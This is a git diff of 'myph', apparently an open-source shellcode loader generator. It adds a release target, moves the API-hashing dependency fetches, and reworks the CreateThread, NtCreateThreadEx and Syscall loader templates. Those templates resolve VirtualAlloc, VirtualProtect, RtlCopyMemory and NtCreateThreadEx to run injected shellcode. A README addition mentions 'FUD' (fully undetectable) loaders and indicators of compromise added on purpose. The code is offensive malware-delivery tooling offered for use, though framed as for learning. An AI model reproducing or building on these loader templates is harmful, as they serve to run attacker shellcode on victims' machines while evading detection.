diff --git a/.goreleaser.yaml b/.goreleaser.yaml index 9b3ce1c..3aca500 100644 --- a/.goreleaser.yaml +++ b/.goreleaser.yaml @@ -20,6 +20,8 @@ builds: - linux - windows - darwin + goarch: + - amd64 archives: - format: tar.gz diff --git a/Makefile b/Makefile index 5870b63..09d5f30 100644 --- a/Makefile +++ b/Makefile @@ -2,7 +2,7 @@ # ------------------- APP_NAME = myph -APP_VERSION = 1.2.2 +APP_VERSION = 1.2.3 GIT_REVISION = `git rev-parse HEAD` DOCKER_IMAGE_TAG ?= $(APP_VERSION) DOCKER_LOCAL_IMAGE = $(APP_NAME):$(DOCKER_IMAGE_TAG) @@ -56,3 +56,7 @@ clean: ## clean up the project directory .PHONY: docker docker: ## build a local docker image @docker build . -t $(APP_NAME):latest -t $(APP_NAME):$(APP_VERSION) + +.PHONY: release-build +release-build: ## makes a release build locally on the current commit + @goreleaser release --skip=publish --snapshot diff --git a/README.md b/README.md index 823e686..0b4ba93 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,9 @@ for general information and testing. The tool and this repository are carefully However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of or related to the access to or use of the software. +> IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless. +> The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own. + ## How to use the software ? > Please note this project is under development & subject to changes. diff --git a/cli/parser.go b/cli/parser.go index 113be2a..dfd23f1 100644 --- a/cli/parser.go +++ b/cli/parser.go @@ -71,7 +71,7 @@ func BuildLoader(opts *Options) *exec.Cmd { func GetParser(opts *Options) *cobra.Command { - version := "1.2.2" + version := "1.2.3" var spoofMetadata = &cobra.Command{ Use: "spoof", Version: version, @@ -143,6 +143,32 @@ func GetParser(opts *Options) *cobra.Command { os.Exit(1) } + if opts.UseAPIHashing { + fmt.Printf("[+] Retrieving dependencies to use API Hashing...\n") + + execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe") + execGoGetCmd.Dir = MYPH_TMP_DIR + _, _ = execGoGetCmd.Output() + + if opts.WithDebug { + // if running debug, we want to have the local internals because + // it makes development easier + + fmt.Printf("[+] Running \"cp -r ./internals /tmp/myph-out\"\n") + + execGoGetCmd = exec.Command("cp", "-r", "./internals", MYPH_TMP_DIR) + execGoGetCmd.Dir = "." + _, _ = execGoGetCmd.Output() + + } else { + // this should stay to cmepw addr + execGoGetCmd = exec.Command("go", "get", "github.com/cmepw/myph/internals") + execGoGetCmd.Dir = MYPH_TMP_DIR + _, _ = execGoGetCmd.Output() + } + + } + /* reading the shellcode as a series of bytes */ shellcode, err := tools.ReadFile(opts.ShellcodePath) if err != nil { @@ -274,12 +300,6 @@ func GetParser(opts *Options) *cobra.Command { fmt.Printf("\n[+] Template (%s) written to tmp directory. Compiling...\n", opts.Technique) - if opts.UseAPIHashing { - execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe") - execGoGetCmd.Dir = MYPH_TMP_DIR - _, _ = execGoGetCmd.Output() - } - execCmd := BuildLoader(opts) execCmd.Dir = MYPH_TMP_DIR diff --git a/loaders/createThread.go b/loaders/createThread.go index d5333bc..10669e1 100644 --- a/loaders/createThread.go +++ b/loaders/createThread.go @@ -35,24 +35,15 @@ import ( } func (t CreateTTemplate) Const() string { - return fmt.Sprintf(` + if !t.UseApiHashing { + + return fmt.Sprintf(` const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 ) - -`) -} - -func (t CreateTTemplate) Init() string { - - if t.UseApiHashing { - return fmt.Sprintf("\n") - } - - return fmt.Sprintf(` var ( kernel32 = syscall.MustLoadDLL("kernel32.dll") ntdll = syscall.MustLoadDLL("ntdll.dll") @@ -63,7 +54,23 @@ var ( RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") ) - `) + `) + + } + + return fmt.Sprintf(` +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + + +`) +} + +func (t CreateTTemplate) Init() string { + return fmt.Sprintf("\n") } func (t CreateTTemplate) Process() string { diff --git a/loaders/ntCreateThreadEx.go b/loaders/ntCreateThreadEx.go index 6cc2802..7c95a91 100644 --- a/loaders/ntCreateThreadEx.go +++ b/loaders/ntCreateThreadEx.go @@ -29,6 +29,8 @@ import ( return fmt.Sprintf(` import ( + "fmt" + "log" "syscall" "unsafe" ) @@ -38,30 +40,40 @@ import ( func (t NtCreateThreadExTemplate) Const() string { // same consts with or without API Hashing - return fmt.Sprintf(` -const ( - MEM_COMMIT = 0x1000 - MEM_RESERVE = 0x2000 - PAGE_EXECUTE_READ = 0x20 - PAGE_READWRITE = 0x04 -) -`) -} - -func (t NtCreateThreadExTemplate) Init() string { - if t.UseApiHashing { - return fmt.Sprintf("\n") + return fmt.Sprintf(` + const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 + ) + `) } return fmt.Sprintf(` - ntdll := syscall.MustLoadDLL("ntdll.dll") + const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 + ) + + var ( - NtAllocateVirtualMemory = ntdll.MustFindProd("NtAllocateVirtualMemory") - NtWriteVirtualMemory = ntdll.MustFindProd("NtWriteVirtualMemory") - NtProtectVirtualMemory = ntdll.MustFindProd("NtProtectVirtualMemory") - NtCreateThreadEx = ntdll.MustFindProd("NtCreateThreadEx") + ntdll = syscall.MustLoadDLL("ntdll.dll") + + NtAllocateVirtualMemory = ntdll.MustFindProc("NtAllocateVirtualMemory") + NtWriteVirtualMemory = ntdll.MustFindProc("NtWriteVirtualMemory") + NtProtectVirtualMemory = ntdll.MustFindProc("NtProtectVirtualMemory") + NtCreateThreadEx = ntdll.MustFindProc("NtCreateThreadEx") + ) `) + +} + +func (t NtCreateThreadExTemplate) Init() string { + return fmt.Sprintf("\n") } func (t NtCreateThreadExTemplate) Process() string { diff --git a/loaders/syscall.go b/loaders/syscall.go index 78d168c..d989f17 100644 --- a/loaders/syscall.go +++ b/loaders/syscall.go @@ -36,9 +36,9 @@ import ( } func (t SysTemplate) Const() string { - // same consts with or without API Hashing - return fmt.Sprintf(` + if t.UseApiHashing { + return fmt.Sprintf(` const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 @@ -46,24 +46,33 @@ const ( PAGE_READWRITE = 0x04 ) `) -} - -func (t SysTemplate) Init() string { - if t.UseApiHashing { - return fmt.Sprintf("\n") } return fmt.Sprintf(` - kernel32 := syscall.MustLoadDLL("kernel32.dll") - ntdll := syscall.MustLoadDLL("ntdll.dll") +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 +) + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + VirtualProtect = kernel32.MustFindProc("VirtualProtect") + RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") +) - VirtualAlloc := kernel32.MustFindProc("VirtualAlloc") - VirtualProtect := kernel32.MustFindProc("VirtualProtect") - RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory") `) } +func (t SysTemplate) Init() string { + return fmt.Sprintf("\n") +} + func (t SysTemplate) Process() string { if t.UseApiHashing { return fmt.Sprintf(` diff --git a/loaders/utils.go b/loaders/utils.go index 1167b53..02cc105 100644 --- a/loaders/utils.go +++ b/loaders/utils.go @@ -3,7 +3,7 @@ package loaders func InformExpermimental() { println("[!] The API hashing feature is still in an an experimental stage!!") println("Only a few methods are supported for now:") - println("\t-Syscall\n\t-CreateThread\n\t-tNtCreateThreadEx\n") + println("\t-Syscall\n\t-CreateThread\n\t-NtCreateThreadEx\n") } func InformProcessUnused(process string) { diff --git a/utils/utils b/utils/utils deleted file mode 100755 index bd12637..0000000 Binary files a/utils/utils and /dev/null differ